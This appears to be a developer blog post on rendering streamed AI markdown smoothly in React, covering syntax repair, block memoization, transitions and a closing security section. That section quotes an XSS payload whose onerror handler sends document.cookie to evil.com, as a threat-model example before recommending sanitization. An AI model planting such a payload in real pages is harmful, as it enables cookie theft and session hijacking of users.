Introduction

Every AI chat app streams markdown to you token by token. ChatGPT, Claude, Gemini, they all do it. Making that render smoothly is harder than it looks. This post breaks down the problem from first principles and walks through how to solve it.

I learned most of this by studying Streamdown, Vercel's open source solution for this exact problem.

Part 1. Understanding the Problem from First Principles

How AI streaming actually works

When an AI generates a response, it does not send the whole thing at once. It sends tokens, small pieces of text, roughly a word or punctuation mark at a time. Your frontend receives them over a stream via SSE, WebSocket, or something like the AI SDK.

Here is what your React component sees over time.

Render 1: "##"
Render 2: "# Hello"
Render 3: "# Hello\n"
Render 4: "# Hello\n\nThis"
Render 5: "# Hello\n\nThis is"
Render 6: "# Hello\n\nThis is some"
Render 7: "# Hello\n\nThis is some **bold"
Render 8: "# Hello\n\nThis is some **bold**"
Render 9: "# Hello\n\nThis is some **bold** text"
Render 10: "# Hello\n\nThis is some **bold** text\n\n```js"
Render 11: "# Hello\n\nThis is some **bold** text\n\n```js\nconst"
Render 12: "# Hello\n\nThis is some **bold** text\n\n```js\nconst x"
...
Render 50: "# Hello\n\nThis is some **bold\*\* text\n\n`js\nconst x = 1;\n`\n\nMore text..."

Your component re-renders on every single token. For a long AI response, that is hundreds of re-renders, each with a growing string.

The naive approach and why it breaks

The obvious thing to do.

function ChatMessage({ content }: { content: string }) {
  return <ReactMarkdown>{content}</ReactMarkdown>;
}

What happens under the hood on every render.

The entire markdown string gets parsed into an AST, an abstract syntax tree.
The AST gets transformed through plugins like GFM tables and syntax highlighting.
The AST gets converted to React elements.
React diffs the entire element tree against the previous render.
React applies DOM updates.

At render 5, this is fine. At render 200, when the AI has written 2000 words, you are re-parsing 2000 words of markdown and diffing hundreds of DOM nodes on every token. The page jitters, scrolling stutters, the UI feels sluggish. It's bad.

Why this is specifically an AI streaming problem

A normal markdown renderer like a docs site parses once and renders once. The content is static. There is no performance issue.

The AI streaming case is unique. Content grows with hundreds of updates per response. Each update is tiny but triggers a full re-render. The user is watching in real time, so any jank is visible right away. And conversations get long, with multiple messages of complex markdown.

This is the core insight. The problem is not rendering markdown. It's rendering markdown that is being written in front of you, one token at a time.

Part 2. The Three Problems to Solve

There are exactly three problems. Each has a clean solution. They compose together in a specific order.

Problem 1. Broken markdown mid-stream

Before you even think about performance, you have a correctness problem.

At render 7 above, the component receives this.

# Hello

This is some **bold

That **bold is incomplete. The closing ** has not arrived yet. A markdown parser treats this as literal text, so the user sees raw **bold instead of bold. Same thing happens with unclosed backticks, links, code fences, math blocks, and strikethrough.

The AI will complete these eventually, but for the few hundred milliseconds while tokens arrive, the user sees broken rendering that snaps into place. It looks terrible.

Solution. Preprocess the raw string before parsing.

Scan the string. Detect incomplete syntax. Auto-close it temporarily for rendering purposes. The original string is never modified, you only fix the copy that goes to the parser.

Input: "Some **bold"
Output: "Some **bold**"

Input: "Check `this code"
Output: "Check `this code`"

Input: "`js\nconst x = 1"
Output: "`js\nconst x = 1\n```"

This is what Streamdown's remend package does. The key insight: this must happen BEFORE markdown parsing, at the raw string level. Once the parser sees incomplete syntax, it has already misinterpreted it.

The context-awareness trap.

You cannot just scan backwards from the end looking for unmatched **. Consider this.

Here is a code block.

```python
x = 2 ** 3  # exponentiation
```

Those ** inside the code fence are Python syntax, not markdown bold. If you close them, you break the code block. Same issue with $ signs inside code blocks (shell variables look like math), backticks inside code blocks, and so on.

So your repair function needs to track whether it is inside a code fence. The minimum viable check.

function isWithinCodeBlock(text: string, position: number): boolean {
  let inFence = false;
  const lines = text.slice(0, position).split("\n");
  for (const line of lines) {
    if (line.trimStart().startsWith("```")) {
      inFence = !inFence;
    }
  }
  return inFence;
}

Walk the text up to the position you are checking, count triple-backtick lines. Odd count means you are inside a fence.

Priority order for what to repair, highest impact first.

Unclosed code fences, because they are the most visually jarring when broken.
Unclosed bold and italic markers like **, *, __, _.
Unclosed inline code with backticks.
Unclosed links like [text](url.
Unclosed math blocks with $$.

Handling the first three already eliminates most of visual glitches during streaming.

How Streamdown structures this.

Streamdown's remend uses a handler pipeline. Each handler repairs one type of incomplete syntax, runs in priority order, and checks context before acting. It will not close bold markers inside a code fence or backticks inside a math block. Each repair is isolated and testable.

Problem 2. Re-rendering everything on every token

This is the main performance problem. The solution has three parts that work together.

Part A. Split markdown into blocks

Markdown has natural block-level boundaries. Paragraphs separated by blank lines, headings, code fences, lists, blockquotes, tables, horizontal rules.

# Hello ← Block 0, heading

This is a paragraph. ← Block 1, paragraph

- item one ← Block 2, list
- item two

```js ← Block 3, code
const x = 1;
```

Another paragraph. ← Block 4, paragraph


You can use the `marked` lexer to tokenize markdown into these blocks.

```ts
import { Lexer } from 'marked';

function splitIntoBlocks(markdown: string): string[] {
  const tokens = Lexer.lex(markdown, { gfm: true });
  return tokens.map(token => token.raw);
}

That is the core of it. marked handles GFM (GitHub Flavored Markdown), and includes tables, task lists, and strikethrough. It returns tokens with a .raw property containing the original source text. Each token is one block.

Why marked for splitting but not for rendering. marked has a fast lexer good for tokenization. For rendering to React elements, react-markdown or the unified/remark/rehype pipeline gives you component customization and plugin support. Each tool does what it is best at.

The tradeoff. Two parsers means they could disagree on block boundaries. In practice this is rare since marked is spec-compliant and you only use its lexer. But it does force occasional merge logic. Streamdown merges blocks when an HTML tag spans multiple tokens, or when marked splits a math block because it does not understand LaTeX.

Part B. Memoize each block

Each block becomes its own React component wrapped in React.memo.

const Block = React.memo(
  ({ content, ...props }: { content: string }) => {
    return <ReactMarkdown {...props}>{content}</ReactMarkdown>;
  },
  (prev, next) => prev.content === next.content,
);

Now when a new token arrives, blocks 0 through N-1 have the same content as last render so React.memo returns true and skips the re-render entirely. Block N, the last one where the AI is currently writing, has new content so React.memo returns false and re-renders just this one block.

Instead of re-parsing 2000 words, you re-parse one paragraph. That is the win.

Part C. Use stable, index-based keys

This is a subtle but important React detail. When rendering a list of blocks.

{
  blocks.map((block, index) => (
    <Block key={`block-${index}`} content={block} />
  ));
}

Why index-based keys and not content-hash keys.

If you used a content hash as the key like key={hash(block)}, here is what happens when the last block changes from "Some **bo" to "Some **bold". The hash changes, React sees a new key, it unmounts the old Block and mounts a new one. Mounting means creating new DOM nodes, running effects, losing internal state. This is exactly what you do not want. You want React to update the existing Block with new props.

With index-based keys, index 3 existed before and still exists, so React keeps the same component instance. Props changed, so the memo comparator runs, sees new content, and allows a re-render. React updates existing DOM nodes instead of unmounting and remounting.

The general advice against index keys applies when items can be reordered or deleted. Streaming markdown blocks only append or modify the last block. Index keys are correct here.

Problem 3. The rendering pipeline

Once you have clean blocks, each block needs to become React elements. The pipeline is.

Markdown string
  → Parse to Markdown AST with remark
  → Transform with remark plugins like GFM and math
  → Convert to HTML AST with remark-rehype
  → Transform with rehype plugins like sanitize and highlight
  → Convert to JSX with hast-util-to-jsx-runtime, or react-markdown does this for you
  → React elements

If you are using react-markdown, this pipeline is handled for you.

<ReactMarkdown remarkPlugins={[remarkGfm]} rehypePlugins={[rehypeSanitize]}>
  {content}
</ReactMarkdown>

Optimization. Cache the processor.

The unified pipeline compiles plugins into a processor. Creating one is expensive. If your plugins do not change between renders (and they should not), cache it.

const processor = useMemo(
  () =>
    unified()
      .use(remarkParse)
      .use(remarkGfm)
      .use(remarkRehype)
      .use(rehypeSanitize)
      .use(rehypeStringify),
  [],
);

Streamdown takes this further with an LRU cache of up to 100 processors keyed by plugin configuration, so multiple component instances with different plugins each get their own cached processor.

Part 3. The Complete Data Flow

Here is the full pipeline, end to end, in the order things happen.

1. AI sends token via stream
       ↓
2. Your state updates, setContent(prev => prev + token)
       ↓
3. Component re-renders with new content string
       ↓
4. REPAIR. repairMarkdown(content) fixes incomplete syntax
   "Some **bold" → "Some **bold**"
       ↓
5. SPLIT. splitIntoBlocks(repaired) returns string[]
   ["# Hello", "Some **bold**"]
   This is memoized and only recalculates if the string changed.
       ↓
6. TRANSITION. setDisplayBlocks(blocks) wrapped in startTransition
   This makes the update interruptible so React can abandon a stale render.
       ↓
7. RENDER. blocks.map((block, i) => <Block key={i} content={block} />)
   Blocks 0..N-1 have unchanged content so React.memo skips them, zero work.
   Block N has changed content so it re-renders, parses one block, updates DOM.
       ↓
8. User sees smooth, incremental rendering.

Why startTransition matters

When the AI streams fast, you might get 10 tokens in 100ms. Without startTransition, each triggers a synchronous render. React cannot interrupt a synchronous render, so if render 1 takes 30ms, renders stack up and the UI freezes.

With startTransition, block updates are marked as low priority. React starts rendering with token 1. When token 2 arrives mid-render, React abandons that render and starts over. Token 3 arrives, abandons again. When there is a pause in tokens, React finishes the latest render.

The user sees the latest state, not every intermediate state. The UI stays responsive.

const [blocks, setBlocks] = useState<string[]>([]);
const [isPending, startTransition] = useTransition();

useEffect(() => {
  const newBlocks = splitIntoBlocks(repairedContent);
  startTransition(() => {
    setBlocks(newBlocks);
  });
}, [repairedContent]);

This is a React 18+ feature and one of its best real-world use cases.

Part 4. The Memoization Details

The custom comparator on Block

Streamdown does not use the default React.memo shallow comparison. It uses a custom comparator.

const Block = memo(Component, (prevProps, nextProps) => {
  // Return true to SKIP re-render, false to ALLOW re-render
  if (prevProps.content !== nextProps.content) return false;
  if (prevProps.index !== nextProps.index) return false;
  // Deep-compare the components object, shallow check each key
  // Reference-compare plugin arrays
  return true;
});

Why custom. The default React.memo does Object.is on every prop. If a parent passes a new object reference for components but the actual functions inside are the same, default memo would re-render unnecessarily. The custom comparator checks what actually matters.

The top-level memo is intentionally lossy

The outer Streamdown component has a memo comparator that intentionally ignores several props.

memo(
  StreamdownInner,
  (prev, next) =>
    prev.children === next.children &&
    prev.isAnimating === next.isAnimating &&
    prev.mode === next.mode &&
    prev.plugins === next.plugins,
  // caret, controls, components, remarkPlugins, rehypePlugins
  // are deliberately NOT checked
);

This is a deliberate tradeoff. Those props almost never change during streaming, so checking them is wasted work. If someone changes caret mid-stream, it will not update until children changes on the next token. Speed over correctness for props that are effectively static.

Memoization is not free. Comparing props that never change is pure overhead. Know your hot path and optimize the comparator for it.

useMemo layering

Streamdown chains useMemo calls so each step only recalculates when its specific input changes.

// Layer 1. Only re-run repair when raw content changes
const processed = useMemo(() => repairMarkdown(children), [children]);

// Layer 2. Only re-split when processed content changes
const blocks = useMemo(() => splitIntoBlocks(processed), [processed]);

// Layer 3. Only recompute directions when blocks change
const directions = useMemo(() => blocks.map(detectDirection), [blocks]);

// Layer 4. Only regenerate keys when block COUNT changes, not content
const keys = useMemo(
  () => blocks.map((_, i) => `\({id}-\){i}`),
  [blocks.length, id],
);

Note the key generation depends on blocks.length, not blocks. The keys only need to change when a new block appears and the length increases, not when an existing block's content updates. Memoize at the narrowest dependency possible.

Part 5. Putting It All Together

Here is the complete minimal implementation, roughly 60 lines that handle all three core problems.

import { memo, useEffect, useMemo, useState, useTransition } from "react";
import ReactMarkdown from "react-markdown";
import remarkGfm from "remark-gfm";
import { Lexer } from "marked";

// --- Repair ---

function repairMarkdown(text: string): string {
  if (!text) return text;
  let result = text;

  // Close unclosed code fences, must be first because it affects context for everything else
  let fenceCount = 0;
  for (const line of result.split("\n")) {
    if (line.trimStart().startsWith("```")) fenceCount++;
  }
  if (fenceCount % 2 === 1) {
    return result + "\n```"; // Inside code fence, do not repair inline syntax
  }

  // Close unclosed bold
  const boldMatches = result.match(/\*\*/g);
  if (boldMatches && boldMatches.length % 2 === 1) {
    result = result + "**";
  }

  // Close unclosed inline code
  const backtickMatches = result.match(/(?<!`)`(?!`)/g);
  if (backtickMatches && backtickMatches.length % 2 === 1) {
    result = result + "`";
  }

  return result;
}

// --- Block Splitting ---

function splitIntoBlocks(markdown: string): string[] {
  const tokens = Lexer.lex(markdown, { gfm: true });
  return tokens.map((token) => token.raw);
}

// --- Memoized Block ---

const Block = memo(
  ({ content }: { content: string }) => (
    <ReactMarkdown remarkPlugins={[remarkGfm]}>{content}</ReactMarkdown>
  ),
  (prev, next) => prev.content === next.content,
);

// --- Streaming Component ---

function StreamingMarkdown({ content }: { content: string }) {
  const [displayBlocks, setDisplayBlocks] = useState<string[]>([]);
  const [, startTransition] = useTransition();

  const repaired = useMemo(() => repairMarkdown(content), [content]);
  const blocks = useMemo(() => splitIntoBlocks(repaired), [repaired]);

  useEffect(() => {
    startTransition(() => setDisplayBlocks(blocks));
  }, [blocks]);

  return (
    <div className="space-y-4">
      {displayBlocks.map((block, i) => (
        <Block key={`block-${i}`} content={block} />
      ))}
    </div>
  );
}

That handles broken syntax, block-level memoization, and interruptible streaming updates. Everything beyond this — syntax highlighting, math, Mermaid diagrams, RTL detection, animations, the full remend pipeline — is production polish on top of this core.

Part 6. Security

The threat model

AI-generated markdown can contain anything. Users can inject content through their prompts that ends up in the AI response. Consider this.

<img
  src="x"
  onerror="document.location='https://evil.com/?cookie='+document.cookie"
/>

If you render raw HTML from markdown without sanitization, you have an XSS vulnerability, which stands for cross-site scripting. An attacker could steal session cookies, redirect users to phishing pages, inject scripts that modify the page, or exfiltrate data from the page.

What sanitize raw HTML means concretely

By default, react-markdown escapes HTML, which is safe but limiting. To render HTML blocks, you use rehype-raw to parse them, then rehype-sanitize to strip dangerous elements and attributes.

import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";

<ReactMarkdown rehypePlugins={[rehypeRaw, rehypeSanitize]}>
  {content}
</ReactMarkdown>;

rehype-sanitize uses an allowlist. Only safe tags (p, a, img, code, pre, table) and safe attributes (href, src, alt, class) pass through. Script tags, onerror handlers, javascript protocol URLs — all stripped.

Why this matters for AI renderers specifically

A docs site controls its own content. An AI markdown renderer does not. It displays content generated by a model prompted by a user. If an attacker crafts a prompt that makes the AI produce malicious HTML and your renderer blindly renders it, you have a vulnerability. The renderer is a trust boundary between user-influenced AI output and the DOM.

What Streamdown does

Streamdown applies three layers. rehype-raw to parse HTML in markdown into the AST. rehype-sanitize to strip dangerous elements via an allowlist. rehype-harden for link and image safety like URL validation and protocol enforcement.

You do not need all three, but you need at least sanitization. The attack surface exists — address it in your design, not as an afterthought.

How To Build a Performant AI Markdown Renderer

Introduction

Part 1. Understanding the Problem from First Principles

How AI streaming actually works

The naive approach and why it breaks

Why this is specifically an AI streaming problem

Part 2. The Three Problems to Solve

Problem 1. Broken markdown mid-stream

Problem 2. Re-rendering everything on every token

Part A. Split markdown into blocks

Part B. Memoize each block

Part C. Use stable, index-based keys

Problem 3. The rendering pipeline

Part 3. The Complete Data Flow

Why startTransition matters

Part 4. The Memoization Details

The custom comparator on Block

The top-level memo is intentionally lossy

useMemo layering

Part 5. Putting It All Together

Part 6. Security

The threat model

What sanitize raw HTML means concretely

Why this matters for AI renderers specifically

What Streamdown does

Comments

More from this blog

IK and FK, what they actually are

How to make your textures fast on the GPU

Convex hulls and why they matter for collision

Juice is the difference between a game that feels alive and one that doesn't

Just write your own libraries

Command Palette

Introduction

Part 1. Understanding the Problem from First Principles

How AI streaming actually works

The naive approach and why it breaks

Why this is specifically an AI streaming problem

Part 2. The Three Problems to Solve

Problem 1. Broken markdown mid-stream

Problem 2. Re-rendering everything on every token

Part A. Split markdown into blocks

Part B. Memoize each block

Part C. Use stable, index-based keys

Problem 3. The rendering pipeline

Part 3. The Complete Data Flow

Why startTransition matters

Part 4. The Memoization Details

The custom comparator on Block

The top-level memo is intentionally lossy

useMemo layering

Part 5. Putting It All Together

Part 6. Security

The threat model

What sanitize raw HTML means concretely

Why this matters for AI renderers specifically

What Streamdown does

Comments

More from this blog